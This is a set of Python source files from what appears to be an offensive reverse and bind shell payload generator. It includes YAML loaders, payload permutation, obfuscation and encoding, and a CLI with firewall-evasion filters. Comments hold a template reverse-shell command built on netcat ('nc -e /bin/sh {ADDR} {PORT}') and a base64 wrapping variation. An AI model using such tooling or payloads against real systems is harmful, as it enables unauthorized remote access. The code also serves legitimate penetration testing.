"""Payload class."""
from typing import Dict, List, Any
from .ds_base import DsBase
from .ds_payload_filter import DsPayloadFilter


class DsPayload(DsBase):
    """Payload Data Structure."""

    # --------------------------------------------------------------------------
    # Properties
    # --------------------------------------------------------------------------
    @property
    def filters(self) -> DsPayloadFilter:
        """Returns filters."""
        return self.__filters

    @property
    def group(self) -> str:
        """Returns payload group."""
        return self.__group

    @property
    def original(self) -> List[str]:
        """Returns a list of original payload strings before mutation/compression."""
        return self.__original

    # --------------------------------------------------------------------------
    # Constructor
    # --------------------------------------------------------------------------
    def __init__(
        self,
        name: str,
        desc: str,
        info: List[str],
        group: str,
        meta: Dict[str, Any],
        filters: DsPayloadFilter,
        payload: str,
        original: List[str],
    ) -> None:
        """Constructor."""
        # Initialize parent class
        super(DsPayload, self).__init__(name, desc, info, meta, filters, payload)

        # Initialize variables
        self.__group = group
        self.__filters = filters
        self.__original = original



"""Base Filter class."""
from typing import List, Any


class DsBaseFilter:
    """Base Filter Data Structure for obsuscators and payloads to inherit from."""

    @property
    def exe(self) -> str:
        """Returns the executable to run the payload."""
        return self.__exe

    @property
    def shell(self) -> str:
        """Returns a list of underlying shells on which the payload works."""
        return self.__shell

    @property
    def cmd_exe(self) -> str:
        """Returns the executable to run the payload."""
        return self.__cmd_exe

    @property
    def cmd_shell(self) -> str:
        """Returns a list of underlying shells on which the payload works."""
        return self.__cmd_shell

    @property
    def shells(self) -> List[str]:
        """Returns a list of underlying shells on which the payload works."""
        return self.__shells

    @property
    def os(self) -> List[str]:
        """Returns a list of operating systems on which the payload works."""
        return self.__os

    @property
    def commands(self) -> List[str]:
        """Returns a list of additional commands used by the payload."""
        return self.__commands

    @property
    def proto(self) -> str:
        """Returns the protocol used by the payload: 'tcp' or 'udp'."""
        return self.__proto

    @property
    def direction(self) -> str:
        """Returns the payload shell type: 'bind' or 'reverse'."""
        return self.__direction

    @property
    def encoders(self) -> List[str]:
        """Returns list of used encoder functions."""
        return self.__encoders

    def __init__(
        self,
        exe: str,
        cmd_exe: str,
        shell: str,
        cmd_shell: str,
        shells: List[str],
        os: List[str],
        commands: List[str],
        proto: str,
        direction: str,
        encoders: List[str],
    ) -> None:
        self.__exe = exe
        self.__shell = shell
        self.__cmd_exe = cmd_exe
        self.__cmd_shell = cmd_shell
        self.__shells = shells
        self.__os = os
        self.__commands = commands
        self.__proto = proto
        self.__direction = direction
        self.__encoders = encoders



"""Payload module."""
from typing import Dict, List, Any


class DsPayloadFilter:
    """Data Structure for Payload filters."""

    @property
    def exe(self) -> str:
        """Returns the executable to run the payload."""
        return self.__exe

    @property
    def shells(self) -> List[str]:
        """Returns a list of underlying shells on which the payload works."""
        return self.__shells

    @property
    def os(self) -> List[str]:
        """Returns a list of operating systems on which the payload works."""
        return self.__os

    @property
    def commands(self) -> List[str]:
        """Returns a list of additional commands used by the payload."""
        return self.__commands

    @property
    def proto(self) -> str:
        """Returns the protocol used by the payload: 'tcp' or 'udp'."""
        return self.__proto

    @property
    def direction(self) -> str:
        """Returns the payload shell type: 'bind' or 'reverse'."""
        return self.__direction

    @property
    def obfuscator(self) -> List[str]:
        """Returns list of used obfuscator functions."""
        return self.__obfuscator

    def __init__(
        self,
        exe: str,
        shells: List[str],
        os: List[str],
        commands: List[str],
        proto: str,
        direction: str,
        obfuscator: List[str],
    ) -> None:
        self.__exe = exe
        self.__shells = shells
        self.__os = os
        self.__commands = commands
        self.__proto = proto
        self.__direction = direction
        self.__obfuscator = obfuscator



"""This file provides functions to load the obfuscators."""

from typing import List, Dict, Any

import os
import pathlib

from .validator import VALIDATOR
from ...permutator import permutate_variables
from ...permutator import obfuscate_payloads
from ...obfuscator import get_obfuscators
from ...typing.ds_payload import DsPayload
from ...typing.ds_payload_filter import DsPayloadFilter
from ....lib.yaml import load as load_yaml
from ....lib.template import get_template_dir
from ...parser import parse_functions
from ...compressor import compress


# Available obfuscator files
PAYLOADS = [
    "bash.yml",
    "nc.yml",
]


def _load(placeholders: Dict[str, str]) -> List[DsPayload]:
    """Load available payloads."""
    payloads = []
    obfuscators = get_obfuscators()

    for name in PAYLOADS:
        # Load payload file
        path = get_template_dir(["payloads", "cmd", name])
        data = load_yaml(path, VALIDATOR)

        for item in data["payloads"]:
            # Replace placeholder
            for key, val in placeholders.items():
                item["payload"] = item["payload"].replace(key, val)

            # Update the cmd filter accordingly
            item["filters"]["cmd"] = data["command"]

            # Compress payload
            item["payload"] = compress(item["payload"])

            # Parse functions
            item["payload"] = parse_functions(item["payload"])

            # Permutate variables
            for payload in permutate_variables(item):

                # Append de-variablized payload to list
                payloads.append(_get_payload_from_item(payload))

                # Permutate obfuscations
                for obfuscated in obfuscate_payloads(payload, obfuscators):
                    # TODO: Do I have to add it back to "original" before?

                    # Compress payload
                    obfuscated["payload"] = compress(obfuscated["payload"])

                    # Parse function
                    obfuscated["payload"] = parse_functions(obfuscated["payload"])
                    # Append obfuscated payload to list
                    payloads.append(_get_payload_from_item(obfuscated))
    return payloads


def _get_payload_from_item(item: Dict[str, List]) -> DsPayload:
    """Returns DsPayload data structure from item."""
    filters = DsPayloadFilter(
        item["filters"]["cmd"],
        item["filters"]["cmd_exe"],
        item["filters"]["shell"],
        item["filters"]["cmd_shell"],
        item["filters"]["shells"],
        item["filters"]["os"],
        item["filters"]["commands"],
        item["filters"]["proto"],
        item["filters"]["direction"],
        item["filters"]["encoders"],
    )
    # Return Payload
    return DsPayload(
        item["name"],
        item["desc"],
        item["info"],
        item["filters"]["cmd"],
        item["meta"],
        filters,
        item["payload"],
        item["original"],
    )



"""Module to load a yaml template."""
from typing import Dict, List, Union, Any

import errno
import os
import yaml


class YamlLoader(object):
    """Read yaml template files."""

    @staticmethod
    def load(path: str) -> Dict[Any, Any]:
        """Return dict of a yaml template file by given path, validates it and adds defaults.

        Args:
            path (str): Path to yaml template file.

        Returns:
            Dict[Any, Any]: The loaded yaml file with valid keys and types.

        Raises:
            OSError: If file not found or no permission to read it.
            KeyError: If yaml is invalid, ha missing or wrong keys.
        """
        # payload: cmd        # cmd, code or file
        # direction: reverse  # reverse or bind
        # payloads:
        #   <key>:
        #     name: <key-name>
        #     desc: <key-desc>
        #     items: []
        data = YamlLoader.__load_yaml(path)
        if not isinstance(data, dict):
            raise KeyError(f"file must be of type dict: {path}")

        # payload
        if "payload" not in data:
            raise KeyError(f"file must contain payload key in: {path}")
        if not isinstance(data["payload"], str):
            raise KeyError(f"payload key must be of type str in: {path}")
        if data["payload"] not in ["cmd", "code", "file"]:
            raise KeyError(f"payload key must have a value of cmd, code or file in: {path}")

        # direction
        if "direction" not in data:
            raise KeyError(f"file must contain direction key in: {path}")
        if not isinstance(data["direction"], str):
            raise KeyError(f"direction key must be of direction str in: {path}")
        if data["direction"] not in ["reverse", "bind"]:
            raise KeyError(f"direction key must have a value of reverse or bind in: {path}")

        # payloads
        if "payloads" not in data:
            raise KeyError(f"file must contain payloads key in: {path}")
        if not isinstance(data["payloads"], dict):
            raise KeyError(f"payloads key must be of type dict in: {path}")

        valid_keys = ["direction", "payload", "payloads"]
        for toplevel_key in data:
            if toplevel_key not in valid_keys:
                raise KeyError(f"{toplevel_key} is a wrong top-level key in: {path}")

        for key, val in data["payloads"].items():
            for i in range(len(val["items"])):
                try:
                    YamlLoader.__validate_item(val["items"][i])
                except KeyError as error:
                    raise KeyError(f"[ERROR] payload.{key}: {error} in: {path}")
                data["payloads"][key]["items"][i] = YamlLoader.__add_item_defaults(
                    val["items"][i], data["payload"], data["direction"]
                )

        return data

    # --------------------------------------------------------------------------
    # Private functions
    # --------------------------------------------------------------------------
    @staticmethod
    def __add_item_defaults(
        item: Dict[str, Any], payload_type: str, payload_direction: str
    ) -> Dict[str, Any]:
        # filters:
        item["filters"]["direction"] = payload_direction
        item["filters"]["payload"] = payload_type

        # variables:
        #   - name: shell
        #     filters:
        #       shell: {VAR:shell}
        #     values:
        #       - val1
        #       - val2
        if "variables" not in item:
            item["variables"] = []

        for i in range(len(item["variables"])):
            if "filters" not in item["variables"][i]:
                item["variables"][i]["filters"] = {}

        # variations:
        #   - name: shell
        #     filters:
        #       obfuscated: true
        #     payload: $(echo {PAYLOAD}|base64)|{VAR:shell}
        if "variations" not in item:
            item["variations"] = []

        for i in range(len(item["variations"])):
            if "filters" not in item["variations"][i]:
                item["variations"][i]["filters"] = {}

        return item

    @staticmethod
    def __validate_item(item: Dict[str, Any]) -> None:
        """Validate yaml and throws a KeyError exception on wrong/missing keys."""
        # item = {
        #   name: payload-name
        #   desc: payload-desc
        #   filters: {}
        #   variables: []
        #   variations: []
        #   payload: nc -e /bin/sh {ADDR} {PORT}
        # }
        valid_keys = ["name", "desc", "filters", "variables", "variations", "payload"]

        if not isinstance(item, dict):
            raise KeyError("item must be of type dict")

        if "name" not in item:
            raise KeyError("name key is missing")
        if not item["name"]:
            raise KeyError("name key must not be empty")
        if not isinstance(item["name"], str):
            raise KeyError("name key must be a string")

        if "desc" not in item:
            raise KeyError("desc key is missing")
        if not item["desc"]:
            raise KeyError("desc key must not be empty")
        if not isinstance(item["desc"], str):
            raise KeyError("desc key must be a string")

        if "payload" not in item:
            raise KeyError("payload key is missing")
        if not item["payload"]:
            raise KeyError("payload key must not be empty")
        if not isinstance(item["payload"], str):
            raise KeyError("payload key must be a string")

        if "filters" not in item:
            raise KeyError("filters key is missing")

        # check for invalid keys
        for key in item:
            if key not in valid_keys:
                raise KeyError(f"Invalid key: {key}")

        # variables:
        #   - name: shell
        #     filters:
        #       shell: {VAR:shell}
        #     values:
        #       - val1
        #       - val2
        if "variables" in item:
            valid_keys = ["name", "filters", "values"]

            if not isinstance(item["variables"], list):
                raise KeyError("variables key must be a list")

            for i in range(len(item["variables"])):
                # Check name
                if "name" not in item["variables"][i]:
                    raise KeyError("name key is missing in variables")
                if not item["variables"][i]["name"]:
                    raise KeyError("name key must not be empty in variables")
                if not isinstance(item["variables"][i]["name"], str):
                    raise KeyError("name key must be a string in variables")
                # Check filters
                if "filters" in item["variables"][i]:
                    if not isinstance(item["variables"][i]["filters"], dict):
                        raise KeyError("filters key must be a dict in variables")
                # Check values
                if "values" not in item["variables"][i]:
                    raise KeyError("values key is missing in variables")
                if not item["variables"][i]["values"]:
                    raise KeyError("values key must not be empty in variables")
                if not isinstance(item["variables"][i]["values"], list):
                    raise KeyError("values key must be a list in variables")

                # check for invalid keys
                for key in item["variables"][i]:
                    if key not in valid_keys:
                        raise KeyError(f"Invalid key: {key} in variables")

        # variations:
        #   - name: shell
        #     filters:
        #       obfuscated: true
        #     payload: $(echo {PAYLOAD}|base64)|{VAR:shell}
        if "variations" in item:
            valid_keys = ["name", "filters", "payload"]

            if not isinstance(item["variations"], list):
                raise KeyError("variations key must be a list")

            for i in range(len(item["variations"])):
                # Check name
                if "name" not in item["variations"][i]:
                    raise KeyError("name key is missing in variations")
                if not item["variations"][i]["name"]:
                    raise KeyError("name key must not be empty in variations")
                if not isinstance(item["variations"][i]["name"], str):
                    raise KeyError("name key must be a string in variations")
                # Check filters
                if "filters" in item["variations"][i]:
                    if not isinstance(item["variations"][i]["filters"], dict):
                        raise KeyError("filters key must be a dict in variations")
                # Check payload
                if "payload" not in item["variations"][i]:
                    raise KeyError("payload key is missing in variations")
                if not item["variations"][i]["payload"]:
                    raise KeyError("payload key must not be empty in variations")
                if not isinstance(item["variations"][i]["payload"], str):
                    raise KeyError("payload key must be a list in variations")

                # check for invalid keys
                for key in item["variations"][i]:
                    if key not in valid_keys:
                        raise KeyError(f"Invalid key: {key} in variations")

    @staticmethod
    def __load_yaml(path: str) -> Dict[Any, Any]:
        """Load yaml file and return yaml dictionary.

        Args:
            path (str): Path to yaml file.

        Returns:
            dict: Python dict from yaml file.

        Raises:
            OSError: If file not found or yaml cannot be parsed.
        """
        try:
            file_p = open(path)
        except FileNotFoundError as err_file:
            error = os.strerror(errno.ENOENT)
            raise OSError(f"File does not exist: {path}\n{error}")
        except PermissionError as err_perm:
            error = os.strerror(errno.EACCES)
            raise OSError(f"No permission to load file form: {path}\n{error}")
        else:
            try:
                return dict(yaml.safe_load(file_p))
            except yaml.YAMLError as err_yaml:
                error = str(err_yaml)
                raise KeyError(f"[ERROR]: {path}\n{error}") from err_yaml
            finally:
                file_p.close()



"""Module that returns template directories."""

from typing import List
import os
import pathlib


TEMPLATE_DIR = "files"


def get_template_dir(dirs: List[str] = []) -> str:
    """Returns absolute path of template dir."""
    path = pathlib.Path(__file__).parent.absolute()
    path = path.parent.absolute()
    path = path.parent.absolute()
    path = os.path.join(path, TEMPLATE_DIR)
    # Add specified sub directories (if any)
    for subdir in dirs:
        path = os.fspath(os.path.join(path, subdir))
    return path



"""Module to load and validate a yaml configuration file."""

from typing import Dict, Any

from .loader import _load
from .validator import _validate_requirements
from .validator import _validate_invalid_keys


def load(path: str, validator: Dict[Any, Any]) -> Dict[Any, Any]:
    """Load yaml file by path and return it as Python dictionary.

    Args:
        path (str): Path to yaml file.
        validator: (Dict[Any, Any]): Yaml dict used to validate a loaded yaml file against.

    Raises:
        OSError: If yaml file cannot not found or read (permission-wise).
        KeyError: If yaml file cannot be parsed or is not valid for its validator.
    """
    data = _load(path)
    try:
        _validate_requirements("", data, validator)  # Ensure all keys are defined
        _validate_invalid_keys("", data, validator)  # Ensure no extra keys are defined
    except KeyError as error:
        raise KeyError(f"{error}\nIn file:{path}") from error
    return data



"""This file provides functions to load the obfuscators."""

from typing import List, Dict, Any

import os
import pathlib

from .validator import VALIDATOR
from ...lib.yaml import load as load_yaml
from ...lib.template import get_template_dir


# Available obfuscator files
OBFUSCATORS = ["cmd.yml"]


def _load() -> List[Dict[Any, Any]]:
    """Load available obfuscator."""
    items = []
    for name in OBFUSCATORS:
        path = get_template_dir(["obfuscators", name])
        data = load_yaml(path, VALIDATOR)
        items += data["obfuscators"]
    return items



"""Module to output the payloads on the command line."""

from typing import List, Optional, Any
from .template.ds.ds_payload import DsPayload
from .defaults import BADCHARS
from .core.encoder import encode

import sys
from termcolor import cprint


# --------------------------------------------------------------------------------------------------
# Public module functions
# --------------------------------------------------------------------------------------------------
def output(
    payloads: List[DsPayload], addr: str, port: str, encoders: List[str], quick: bool
) -> None:
    """Output payloads based on users choice."""
    if quick:
        for i in range(len(payloads)):
            _print_payload(payloads[i], addr, port, encoders, i)
    else:
        for i in range(len(payloads)):
            _print_payload_verbose(payloads[i], addr, port, encoders, i)


# --------------------------------------------------------------------------------------------------
# Private module functions
# --------------------------------------------------------------------------------------------------
class Out:
    """stdout, stderr print class with color support."""

    def __init__(self, colored: bool) -> None:
        self.__colored = colored

    def stderr(self, text: str, color: Optional[str] = None, **kwargs: Any) -> None:
        """Print to stderr with or without color depending on instance settings."""
        if self.__colored:
            cprint(text, color, file=sys.stderr, **kwargs)
        else:
            print(text, file=sys.stderr, **kwargs)

    def stdout(self, text: str, color: Optional[str] = None, **kwargs: Any) -> None:
        """Print to stdout with or without color depending on instance settings."""
        if self.__colored:
            cprint(text, color, **kwargs)
        else:
            print(text, **kwargs)


def _print_payload(
    payload: DsPayload,
    addr: str,
    port: str,
    encoders: List[str],
    index: int,
) -> None:
    """Print a single payload with less verbosity."""
    data = payload.payload

    # Apply output encoders
    for encoder in encoders:
        data = encode(data, encoder)

    p = Out(True)

    # Print headline
    p.stderr("")
    p.stderr("[", end="")
    p.stderr(f"{index}", "blue", end="")
    p.stderr("] ", end="")
    p.stderr(f"{payload.name}")
    # Print payload
    p.stdout(data, "red")


def _print_payload_verbose(
    payload: DsPayload,
    addr: str,
    port: str,
    encoders: List[str],
    index: int,
) -> None:
    """Print a single payload with more verbosity."""
    data = payload.payload

    # Apply output encoders
    for encoder in encoders:
        data = encode(data, encoder)

    p = Out(True)

    # Print headline
    p.stderr("")
    p.stderr("-" * 80)
    p.stderr("[", end="")
    p.stderr(f"{index}", "blue", end="")
    p.stderr("] ", end="")
    p.stderr(f"{payload.name}", "yellow")
    p.stderr("-" * 80)

    # description/info
    p.stderr(f"{payload.desc}", "yellow")
    for info in payload.info:
        p.stderr(f"info: {info}")

    # ------------------------------------------------------------
    # Payload
    # ------------------------------------------------------------
    p.stderr("")
    p.stderr("PAYLOAD", "magenta")

    # target
    p.stderr("  target:     ", end="")
    p.stderr(f"{addr}", "blue", end="")
    p.stderr(":", end="")
    p.stderr(f"{port}", "blue")

    # exe
    p.stderr("  executable  ", end="")
    p.stderr(payload.filters.exe, "blue", end="")
    p.stderr(" (", end="")
    p.stderr(f"{payload.filters.cmd_exe}", end="")
    p.stderr(")")

    # shell
    p.stderr("  shell       ", end="")
    p.stderr(payload.filters.shell, "blue", end="")
    p.stderr(" (", end="")
    p.stderr(f"{payload.filters.cmd_shell}", end="")
    p.stderr(")")

    # proto
    p.stderr("  protocol:   ", end="")
    p.stderr(f"{payload.filters.proto}", "blue")

    # direction
    p.stderr("  direction:  ", end="")
    p.stderr(f"{payload.filters.direction}", "blue")

    # ------------------------------------------------------------
    # Target Requirements
    # ------------------------------------------------------------
    p.stderr("")
    p.stderr("TARGET REQUIREMENTS", "magenta")

    # OS
    p.stderr("  OS:         ", end="")
    total = len(payload.filters.os)
    if not total:
        p.stderr("")
    for i in range(total):
        p.stderr(f"{payload.filters.os[i]}", "blue", end="")
        if i < total - 1:
            p.stderr(", ", end="")
        else:
            p.stderr("")

    # Underlying shells
    p.stderr("  Works from: ", end="")
    total = len(payload.filters.shells)
    if not total:
        p.stderr("")
    for i in range(total):
        p.stderr(f"{payload.filters.shells[i]}", "blue", end="")
        if i < total - 1:
            p.stderr(", ", end="")
        else:
            p.stderr("")

    # commands
    p.stderr("  Commands:   ", end="")
    total = len(payload.filters.commands)
    if not total:
        p.stderr("")
    for i in range(total):
        p.stderr(f"{payload.filters.commands[i]}", "blue", end="")
        if i < total - 1:
            p.stderr(" and ", end="")
        else:
            p.stderr("")

    # ------------------------------------------------------------
    # Inject Requirements
    # ------------------------------------------------------------
    p.stderr("")
    p.stderr("INJECT REQUIREMENTS", "magenta")

    # bytes
    p.stderr("  size:       ", end="")
    p.stderr(str(len(payload.payload)), "blue", end="")
    p.stderr(" bytes")

    # badchars
    p.stderr("  badchars:   ", end="")
    p.stderr(_get_badchars(payload.payload), "blue")

    # # obfuscator
    # p.stderr("encoders: ", end="")
    # total = len(payload.filters.encoders)
    # if not total:
    #     p.stderr("")
    # for i in range(total):
    #     p.stderr(f"{payload.filters.encoders[i]}", "blue", end="")
    #     if i < total-1:
    #         p.stderr(", ", end="")
    #     else:
    #         p.stderr("")

    # HELP
    p.stderr("")
    p.stderr("# Use '", "green", end="")
    p.stderr(f"-c {index}", "blue", end="")
    p.stderr("' to copy payload to clipboard", "green")

    p.stderr("# Use '", "green", end="")
    p.stderr(f"-q {index}", "blue", end="")
    p.stderr("' to display payload details", "green")

    # output encoder
    total = len(encoders)
    if total:
        p.stderr("")
        p.stderr("output encoder: ", end="")
        for i in range(total):
            p.stderr(f"{encoders[i]}", "green", end="")
            if i < total - 1:
                p.stderr(" -> ", end="")
            else:
                p.stderr("")
        # encoded size
        p.stderr("encoded size:   ", end="")
        p.stderr(str(len(data)), "green", end="")
        p.stderr(" bytes")

    p.stderr("")
    p.stdout(data, "red")
    p.stderr("")

    # p.stderr(payload.filters.exe, "blue")

    # print("", file=sys.stderr)
    # print("", file=sys.stderr)
    # print("-"*80, file=sys.stderr)
    # print(f"[{index}] {payload.name}", file=sys.stderr)
    # cprint(f"{index}", "blue", end="", file=sys.stderr)
    # print("-"*80, file=sys.stderr)
    # print(f"desc: {payload.desc}", file=sys.stderr)

    # print(f"target: {addr}:{port}", file=sys.stderr)

    # print(f"filters:", file=sys.stderr)
    # print(f"  exe:        {payload.filters.exe}", file=sys.stderr)
    # print("  shells:     {}".format(', '.join(payload.filters.shells)), file=sys.stderr)
    # print("  os:         {}".format(', '.join(payload.filters.os)), file=sys.stderr)
    # print("  commands:   {}".format(', '.join(payload.filters.commands)), file=sys.stderr)
    # print(f"  proto:      {payload.filters.proto}", file=sys.stderr)
    # print(f"  direction:  {payload.filters.direction}", file=sys.stderr)
    ##print(f"  obfuscated: {payload.filters.obfuscated}", file=sys.stderr)

    # print("badchars: {}".format(_get_badchars(payload.payload)), file=sys.stderr)
    # print("size: {} bytes".format(len(payload.payload)), file=sys.stderr)

    # print(f"construction:", file=sys.stderr)
    # for step in payload.original:
    #    print(f"  - {step}", file=sys.stderr)

    # print(f"output encoders:", file=sys.stderr)
    # for encoder in encoders:
    #    print(f"  - {encoder}", file=sys.stderr)

    # cprint("options:", "grey", file=sys.stderr)
    # cprint(f"  use '-q {index}' or '--query {index}' to only show this payload", "grey", file=sys.stderr)
    # cprint(f"  use '-c {index}' or '--copy {index}'  to copy payload to clipboard", "grey", file=sys.stderr)
    # cprint(f"  use '-c'    or '--copy'     to copy last payload to clipboard", "grey", file=sys.stderr)

    # print("", file=sys.stderr)
    # print(data)


def _get_badchars(data: str) -> str:
    """Returns the badchars contained in a string."""
    chars = []
    for badchar in BADCHARS:
        if badchar in data:
            chars.append(badchar)
    return "".join(chars)



"""Payload Filter class."""
from typing import Dict, List, Any
from .ds_base_filter import DsBaseFilter


class DsPayloadFilter(DsBaseFilter):
    """Payload Filter Data Structure."""

    # --------------------------------------------------------------------------
    # Constructor
    # --------------------------------------------------------------------------
    def __init__(
        self,
        exe: str,
        cmd_exe: str,
        shell: str,
        cmd_shell: str,
        shells: List[str],
        os: List[str],
        commands: List[str],
        proto: str,
        direction: str,
        encoders: List[str],
    ) -> None:
        """Constructor."""
        # Initialize parent class
        super(DsPayloadFilter, self).__init__(
            exe,
            cmd_exe,
            shell,
            cmd_shell,
            sorted(shells),
            sorted(os),
            commands,
            proto,
            direction,
            encoders,
        )



"""Payload module."""
from typing import Dict, List, Any
from .ds_payload_filter import DsPayloadFilter


class DsPayload:
    """Data Structure for parsed payload (Cmd, Code or File)."""

    # --------------------------------------------------------------------------
    # Properties
    # --------------------------------------------------------------------------
    @property
    def name(self) -> str:
        """Returns payload name."""
        return self.__name

    @property
    def desc(self) -> str:
        """Returns payload description."""
        return self.__desc

    @property
    def group(self) -> str:
        """Returns payload group."""
        return self.__group

    @property
    def filters(self) -> DsPayloadFilter:
        """Returns payload filters."""
        return self.__filters

    @property
    def payload(self) -> str:
        """Returns payload string."""
        return self.__payload

    @property
    def original(self) -> List[str]:
        """Returns a list of original payload strings before mutation/compression."""
        return self.__original

    # --------------------------------------------------------------------------
    # Constructor
    # --------------------------------------------------------------------------
    def __init__(
        self,
        name: str,
        desc: str,
        group: str,
        filters: DsPayloadFilter,
        payload: str,
        original: List[str],
    ) -> None:
        self.__name = name
        self.__desc = desc
        self.__group = group
        self.__filters = filters
        self.__payload = payload
        self.__original = original



"""Base class."""
from typing import Dict, List, Any
from .ds_base_filter import DsBaseFilter


class DsBase:
    """Base Data Structure for obsuscators and payloads to inherit from."""

    # --------------------------------------------------------------------------
    # Properties
    # --------------------------------------------------------------------------
    @property
    def name(self) -> str:
        """Returns name."""
        return self.__name

    @property
    def desc(self) -> str:
        """Returns description."""
        return self.__desc

    @property
    def info(self) -> List[str]:
        """Returns a list of info texts."""
        return self.__info

    @property
    def meta(self) -> Dict[str, Any]:
        """Returns meta information."""
        return self.__meta

    @property
    def filters(self) -> DsBaseFilter:
        """Returns filters."""
        return self.__filters

    @property
    def payload(self) -> str:
        """Returns payload string."""
        return self.__payload

    # --------------------------------------------------------------------------
    # Constructor
    # --------------------------------------------------------------------------
    def __init__(
        self,
        name: str,
        desc: str,
        info: List[str],
        meta: Dict[str, Any],
        filters: DsBaseFilter,
        payload: str,
    ) -> None:
        self.__name = name
        self.__desc = desc
        self.__info = info
        self.__meta = meta
        self.__filters = filters
        self.__payload = payload



"""Parse command line arguments."""

import argparse
import sys

from .defaults import DEF_BIN, DEF_DESC, DEF_VERSION, DEF_AUTHOR, DEF_GITHUB
from .defaults import DEF_PORT
from .core.encoder import argparse_encoder_validate
from .core.encoder import argparse_encoder_list


# class ListEncoderAction(argparse.Action):
#     """Argument action to list available encoder."""
#
#     def __init__(
#         self,
#         option_strings,
#         dest,
#         const=None,
#         default=None,
#         required=False,
#         help=None,
#         metavar=None,
#     ):
#         super(ListEncoderAction, self).__init__(
#             option_strings=option_strings,
#             dest=dest,
#             nargs=0,
#             const=const,
#             default=default,
#             required=required,
#             help=help,
#         )
#
#     def __call__(self, parser, namespace, values, option_string=None):
#         """Custom action entrypoint."""
#         argparse_encoder_list()
#         sys.exit(0)
#
#    # def __init__(self, option_strings, dest, nargs=None, **kwargs):
#    #     super(ListEncoderAction, self).__init__(option_strings, dest, **kwargs)
#
#    # def __call__(self, parser, namespace, values, option_string=None):
#    #     print('%r %r %r' % (namespace, values, option_string))
#    #     #setattr(namespace, self.dest, values)


def _get_version():
    # type: () -> str
    """Return version information."""
    return """%(prog)s: Version %(version)s
(%(url)s) by %(author)s""" % (
        {"prog": DEF_BIN, "version": DEF_VERSION, "url": DEF_GITHUB, "author": DEF_AUTHOR}
    )


def get_args() -> argparse.Namespace:
    """Retrieve command line arguments."""
    # --------------------------------------------------------------------------
    # Main parser
    # --------------------------------------------------------------------------
    parser = argparse.ArgumentParser(
        formatter_class=argparse.RawTextHelpFormatter,
        add_help=False,
        usage="""%(prog)s <payload> [options] addr [host]
       %(prog)s <payload> -h
       %(prog)s -v, --version
       %(prog)s -h, --help"""
        % ({"prog": DEF_BIN}),
        description=DEF_DESC,
    )

    misc = parser.add_argument_group("misc arguments")
    misc.add_argument(
        "-v",
        "--version",
        action="version",
        version=_get_version(),
        help="Show version information and exit",
    )
    misc.add_argument("-h", "--help", action="help", help="Show this help message and exit")

    # --------------------------------------------------------------------------
    # Payload parser
    # --------------------------------------------------------------------------
    payload_parser = parser.add_subparsers(
        metavar="<payload>",
        dest="payload",
    )
    parser_cmd = payload_parser.add_parser(
        "cmd",
        formatter_class=argparse.RawTextHelpFormatter,
        add_help=False,
        help="Generate a command to be executed on a shell.",
        usage="""%(prog)s cmd [options] addr [port]
       %(prog)s cmd -h, --help"""
        % ({"prog": DEF_BIN}),
    )
    parser_code = payload_parser.add_parser(
        "code",
        formatter_class=argparse.RawTextHelpFormatter,
        add_help=False,
        help="Generate source code (e.g.: php).",
        usage="""%(prog)s code [options] addr [port]
       %(prog)s code -h, --help"""
        % ({"prog": DEF_BIN}),
    )
    parser_code.add_argument("-h", "--help", action="help", help="Show this help message and exit")

    parser_file = payload_parser.add_parser(
        "file",
        formatter_class=argparse.RawTextHelpFormatter,
        add_help=False,
        help="Inject source code in a file (e.g.: php in jpeg).",
        usage="""%(prog)s file [options] addr [port]
       %(prog)s file -h, --help"""
        % ({"prog": DEF_BIN}),
    )
    parser_file.add_argument("-h", "--help", action="help", help="Show this help message and exit")

    if len(sys.argv) == 1:
        parser.print_help(sys.stderr)
        print(file=sys.stderr)
        print("Error: the following arguments are required: <payload>", file=sys.stderr)
        sys.exit(1)

    # --------------------------------------------------------------------------
    # Command parser: positional
    # --------------------------------------------------------------------------
    cmd_positional = parser_cmd.add_argument_group("positional arguments")
    cmd_positional.add_argument(
        "addr",
        type=str,
        help="""Address to listen or connect to.

""",
    )
    cmd_positional.add_argument(
        "port",
        nargs="?",
        type=int,
        default=DEF_PORT,
        help="""(Optional) Port to listen or connect to
Default: %(port)i

"""
        % ({"port": DEF_PORT}),
    )

    # --------------------------------------------------------------------------
    # Command parser: query arguments
    # --------------------------------------------------------------------------
    cmd_query = parser_cmd.add_argument_group("query arguments")
    cmd_query.add_argument(
        "-e",
        "--exe",
        type=str,
        nargs="+",
        default="",
        help="""Command that will execute the payload
(e.g.: perl, python, php, nc, sh, bash, cmd, PowerShell, etc)
Default: do not filter by underlying command.

""",
    )
    cmd_query.add_argument(
        "-s",
        "--shell",
        type=str,
        nargs="+",
        default=[],
        help="""Shell on which the command (specified via -e)
will be executed. Some payloads use crazy output
redirections or pipes that will only work on certain
underlying shells.
(e.g.: dash, sh, bash, zsh, cmd, PowerShell)
Default: do not filter by underlying shell.

""",
    )
    cmd_query.add_argument(
        "-b",
        "--badchars",
        type=str,
        default="",
        help="""Exclude any payloads that contain the specified bad chars.
This comes in handy if you encounter a Web Application Firewall
that prohibits certain characters.
Default: Ignore badchars

""",
    )
    cmd_query.add_argument(
        "-o",
        "--os",
        type=str,
        choices=["bsd", "linux", "mac", "windows"],
        default="",
        help="""Only fetch payloads which work on a specific operating system.
Default: fetch for all OS.

""",
    )
    cmd_query.add_argument(
        "-m",
        "--maxlen",
        type=int,
        metavar="bytes",
        default="0",
        help="""Exclude any payloads exceeding the specified max length.

""",
    )

    # --------------------------------------------------------------------------
    # Command parser: mutate arguments
    # --------------------------------------------------------------------------
    cmd_mutate = parser_cmd.add_argument_group("mutate arguments")
    cmd_mutate.add_argument(
        "--enc",
        nargs="+",
        default=[],
        metavar="name",
        type=argparse_encoder_validate,
        help="""Encode shell code with one or more encoders.
When encoding multiple times, pay attention to the
order of specifying encoders.
Note that any filtering (-b, -o, etc) is not done on the
encoded payload. Filtering is done before.
To view available encoders, use --list-encoders.""",
    )

    # --------------------------------------------------------------------------
    # Command parser: helper arguments
    # --------------------------------------------------------------------------
    cmd_helper = parser_cmd.add_argument_group("helper arguments")
    cmd_helper.add_argument(
        "-q",
        "--quick",
        action="store_true",
        help="""Show quick payload results (less detail).

""",
    )
    cmd_helper.add_argument(
        "-c",
        "--copy",
        nargs="?",
        metavar="index",
        type=int,
        default="-1",
        help="""Copy last shown payload to clipboard or specify index
of payload to copy to clipboard.
(indices are shown in square brackets next to payload)

""",
    )

    #
    # TODO:
    # FIXME: -o/--obfuscate   Run the Fun!

    # TODO:
    # FIXME: -n/--noob   Turn on noob mode
    #
    #
    # -q [no] o <OS>, [<OS>]
    # -q p/proto <PROTO>
